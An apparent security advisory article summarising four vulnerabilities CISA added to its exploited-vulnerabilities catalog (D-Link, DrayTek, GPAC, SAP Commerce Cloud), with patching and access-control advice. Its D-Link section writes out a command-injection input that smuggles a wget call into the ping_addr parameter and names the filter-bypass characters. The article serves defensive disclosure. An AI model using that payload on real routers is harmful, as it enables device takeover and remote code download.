Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has recently added four new vulnerabilities to its Known Exploited Vulnerabilities Catalog, signaling ongoing active exploitation. These vulnerabilities present significant risks for organizations that rely on the affected technologies.

CISA’s update highlights several critical vulnerabilities. The first, CVE-2023-25280, pertains to an OS command injection vulnerability found in the D-Link DIR-820 Router. Next, CVE-2020-15415 affects multiple DrayTek Vigor routers, also involving an OS command injection. 

Another important vulnerability, CVE-2021-4043, is related to a null pointer dereference in the Motion Spell GPAC. Lastly, CVE-2019-0344 involves a deserialization of untrusted data vulnerability in SAP Commerce Cloud. 

Technical Details of the Vulnerabilities

CVE-2023-25280: D-Link DIR-820 Router

Published on March 16, 2023, a critical OS command injection vulnerability has been identified in the D-Link DIR-820LA1_FW105B03 router, allowing attackers to escalate privileges to root. This vulnerability is exploited through a crafted payload that targets the ping_addr parameter, posing a serious risk for devices connected to the internet. Specifically, the command injection vulnerability resides in the pingV4Msg function of the “/ping.ccp” component, enabling an attacker to elevate privileges to root.

The affected version is DIR820LA1_FW105B03, and details regarding the vulnerability indicate that it is located in the /sbin/ncc2 file directory. The vulnerable sub_49EDF8 function retrieves the content of the ping_addr variable from requests to /ping.ccp, allowing the execution of system commands. When the ccp_act parameter is set to pingV4Msg, the ccp_ping function references this vulnerable function, creating an avenue for command execution.

Despite efforts to filter potentially harmful input, the function does not adequately filter symbols such as %0a and $, enabling attackers to bypass defenses. To reproduce the vulnerability, specific steps can be followed using the FirmAE simulation firmware. For example, an attacker might initiate a local web server and utilize a crafted attack vector like “ccp_act=pingV4Msg&ping_addr=%0awget http://192.168.0.2” to execute the attack.

CVE-2020-15415: DrayTek Vigor Routers

This vulnerability affects DrayTek Vigor3900, Vigor2960, and Vigor300B devices running versions prior to 1.5.1. It allows for remote command execution through shell metacharacters in a filename, particularly when the text/x-python-script content type is used, posing risks for users of these routers. The security advisory regarding this issue is identified by CVE-2020-14472 and CVE-2020-15415, both of which are classified as critical.

DrayTek has acknowledged the potential exploitation related to the WebUI of the Vigor 2960, 3900, and 300B models. On June 17, 2020, the company released an updated firmware version to address this vulnerability. Affected users are urged to upgrade their firmware to version 1.5.1.1 or later as soon as possible. In the meantime, if immediate upgrading is not feasible, users should disable remote access to their devices or implement an access control list (ACL) for remote access until they can perform the upgrade.

Firmware downloads are available specifically for the UK and Ireland regions. Users who have remote access enabled on their routers are advised to disable it if it is unnecessary, and if remote access must be maintained, it should be restricted using an ACL, which allows only a predefined list of permitted IP addresses to access the router remotely. Alternatively, users can permit remote administration exclusively through a secure VPN or utilize VigorACS for central management.

CVE-2021-4043: Motion Spell GPAC

Identified on February 4, 2022, a null pointer dereference vulnerability in the GPAC library affects versions prior to 1.1.0 and is classified as a medium severity risk with a CVSS score of 5.8. This vulnerability is categorized under CWE-476, which specifically addresses issues related to null pointer dereferencing, where the product attempts to access a pointer expected to be valid but is, in fact, null.

The common consequences of such vulnerabilities include denial of service (DoS), as NULL pointer dereferences often lead to process failures unless exception handling is implemented. Even with exceptional handling, restoring the software to a safe operational state can be quite challenging. In rare cases, if NULL corresponds to the memory address 0x0 and privileged code can access it, it may allow for unauthorized code execution or memory manipulation.

To mitigate the risks associated with null pointer dereference vulnerabilities, it is crucial to check all pointers that could have been modified for NULL before use. Selecting programming languages that inherently reduce susceptibility to such issues can also be beneficial. Additionally, developers should verify the results of all functions returning values to ensure they are non-null prior to use. While checking return values can be effective, it is essential to remain vigilant about race conditions in concurrent environments.

CVE-2019-0344: SAP Commerce Cloud

Published on August 14, 2019, a vulnerability in SAP Commerce Cloud arises from unsafe deserialization, impacting multiple versions and potentially allowing arbitrary code execution with ‘Hybris’ user rights. This vulnerability, identified as CVE-2019-0344, specifically affects versions 6.4, 6.5, 6.6, 6.7, 1808, 1811, and 1905 of the virtualjdbc extension, enabling code injection attacks.

CVE-2019-0344 is characterized by its ability to permit attackers to execute arbitrary code on a target system due to insecure deserialization within the virtualjdbc extension of SAP Commerce Cloud. Exploiting this vulnerability can result in the execution of arbitrary code on affected machines, leveraging the privileges associated with the ‘Hybris’ user.

The vulnerability’s technical details reveal that the insecure deserialization process introduces a critical risk for code injection. To mitigate and prevent potential exploitation, immediate actions are necessary. Users are advised to apply security patches provided by SAP promptly, monitor for unauthorized code execution or unusual system behavior, and restrict access to vulnerable systems.

For long-term security, it is essential to regularly update and patch SAP Commerce Cloud to address known vulnerabilities and implement secure coding practices to prevent future code injection attacks. Ensuring that all systems running the virtualjdbc extension are updated with the latest security patches is crucial in maintaining the integrity and security of the platform.

Conclusion

The vulnerabilities listed by CISA present significant security risks, particularly for organizations using the affected products. Organizations must remain vigilant, promptly address these vulnerabilities, and apply necessary patches or updates. By prioritizing cybersecurity and addressing these vulnerabilities proactively, organizations can enhance their security posture and reduce the risk of exploitation.

Recommendations and Mitigations

1. Organizations should assess their systems for these vulnerabilities and implement the latest security patches.
2. Regularly monitor systems for any signs of exploitation related to these vulnerabilities.
3. Ensure that IT staff are aware of these vulnerabilities and the steps needed for mitigation.
4. Update security policies and incident response plans to account for potential exploits linked to these vulnerabilities.

Related